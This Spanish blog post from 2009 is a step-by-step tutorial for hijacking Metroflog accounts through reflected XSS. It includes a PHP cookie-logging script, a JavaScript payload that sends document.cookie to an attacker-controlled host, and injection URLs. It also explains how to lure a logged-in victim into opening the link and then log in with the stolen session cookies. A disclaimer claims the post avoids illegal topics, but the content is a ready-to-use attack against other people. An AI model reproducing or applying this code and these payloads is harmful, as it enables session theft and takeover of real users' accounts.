InfoMalwares

Hackear metroflog

Publicado el 30. Dic, 2009 por el autor Israel Rangel en la categoria Vulnerabilidades y ha sido 1,062 veces visto.

Primero aclaro que en este blog no se hablan de temas sobre como hackear temas de redes sociales con tales programas, este tema va principalmente derivado de vulnerabilidades dentro de este sistema metroflog (y estreno esta nueva categoría ya que varios seguidores me han pedido que hable sobre esto, que va dentro de la seguridad informática, y así será), por lo que descartamos temas ilegales. Este ataque se efectúa mediante ataques XSS.

Primero tendremos que contar con un hosting que soporte PHP. Esta byethost ó zobyhost.

Posteriormente necesitamos crear 3 archivos que serán robando_cookies.php, hack.js y cookies.txt.

robando_cookies.php

<?php
$cookies = $_GET['cookie'];
$guardando = fopen(“cookies.txt”,”a”);
$ip = $_SERVER['REMOTE_ADDR'];
$hora = date(“G:H:s”);
fwrite($guardando, “IP: $ip \n”);
fwrite($guardando, “Hora: $hora \n”);
fwrite($guardando, “Valores de las cookies: \n”);
fwrite($guardando, “$cookies \n”);
fclose($guardando);
?>

hack.js

window.location=’tuhost.com/roba_cookies.php?cookie=’+document.cookie

0

Ya de haberlos creado, hay que subirlos a nuestro servidor vía FTP, cuando ya este hecho esto, tendremos que localizar el metroflog a hackear, para eso tendremos que buscar la ultima foto que ha subido (la más actual) y que la URL del metroflog quede así:

http://www.metroflog.com/hackear/20091020/foto?pos=20090715&nf=

Procederemos a eliminar la fecha de la foto por lo que quedará así:

http://www.metroflog.com/hackear/20091020/foto?pos=

Ahora, para saber si es vulnerable a un ataque XSS, tendremos que inyectarle código para saber si es vulnerable, para eso hay que agregar el siguiente código en la URL del metroflog:

http://www.metroflog.com/hackear/20091020/foto?pos=<script>alert(/Hacked by%2InfoMalwares)</script>

Al ejecutar este comando, tendrá que aparecer una ventana estilo pop-up diciendo Hacked by InfoMalwares, si aparece quiere decir que es vulnerable y procederemos a hackearle, y si no es vulnerable, no hay nada más que hacer, habrá que recurrir a otro método.

Para robar la cookie a la víctima, tenemos que decirle que te firme tu metroflog, para eso tendrás que enviarle la dirección de la siguiente forma:

http://www.metroflog.com/mimetro/20091020/foto?pos=”><script src=”http://tuhostconphp.com/hack.js”>

**NOTA**: Tenemos que asegurarnos que tu víctima ya haya iniciado su sesión en el metroflog antes de enviarle la URL.

Lo que ara este archivo hack.js es procesar las cookies de la víctima para usarlos tu y enviarlos al archivo cookies.txt, con esto podrás iniciar sesión en su cuenta sin saber su contraseña ^^.

Cuando el usuario ya haya visitado esa URL, te estará enviando automáticamente sus cookies, después de esto puedes descargar el programa IEcv para modificar tus cookies por las de la víctima.

Ya al haberlas cambiado y actualizado por las cookies de la víctima (para eso hay que ver el fichero cookies.txt localizado en tu carpeta del FTP) hay que entrar desde el Internet Explorer al metroflog de la víctima, y estarás como administrador de la cuenta ^^.

Etiquetas: hackear metroflog, quitar metroflog, robar metroflog, vulnerabilidad metroflog, XSS metroflog

Temas relacionados:

• Hackear Hi5!